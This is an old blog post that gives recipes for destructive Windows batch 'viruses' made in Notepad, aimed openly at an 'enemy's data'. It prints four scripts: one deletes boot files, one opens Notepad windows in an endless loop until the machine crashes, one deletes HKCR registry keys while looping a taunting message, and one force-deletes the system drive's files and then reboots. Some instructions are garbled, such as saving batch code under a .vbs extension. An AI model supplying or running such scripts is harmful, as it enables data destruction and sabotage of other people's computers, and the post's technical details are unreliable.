Monday, 8 August 2011

Create a powerful virus with notepad

1) Create a powerful virus with notepad (to delete your enemy's data)

2) How to create a virus that deactivates an OS

Here are the stepts you should follow to make the virus:
This virus will stop and prevent a computer from starting up and the only solution would be to reinstall winsows.

Warning : never try it on your computer.
open up notepad and type in the following

del "C:windows\SYSTEM32\bootok"
/Q/S >nul
del "C:windows\SYSTEM32\bootvid.dll"
del "C:windows\SYSTEM32\bootvrfy"

After you type these save it as "any name you want ".bat
Please let me know if it works.

3) Endless Notepads
All you need to do is to copy the codes , paste it in any notepad or text file, than save the text file with anynam.vbs , and yeah dont forget to change the format from text file to all files.

*NOTE* These codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANETLY deletes files on the computer that cannot be recovered. this will DESTROY the computer.

Endless Notepads

*This will pop up endless notepads until the computer freezes and crashes*
Code:

CODE
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

4) Delete Key Registry Files
All you need to do is to copy the codes , paste it in any notepad or text file, than save the text file with anynam.vbs , and yeah dont forget to change the format from text file to all files.

*NOTE* These codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANETLY deletes files on the computer that cannot be recovered. this will DESTROY the computer.
Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)*

Code:

CODE
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been destroyed. Have a nice day.
GOTO MESSAGE

5) The blue screen of Death

All you need to do is to copy the codes , paste it in any notepad or text file, than save the text file with anynam.vbs , and yeah dont forget to change the format from text file to all files.
*NOTE* These codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANETLY deletes files on the computer that cannot be recovered. this will DESTROY the computer.

The blue screen of Death [this might be dangerous]
Code:
CODE
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00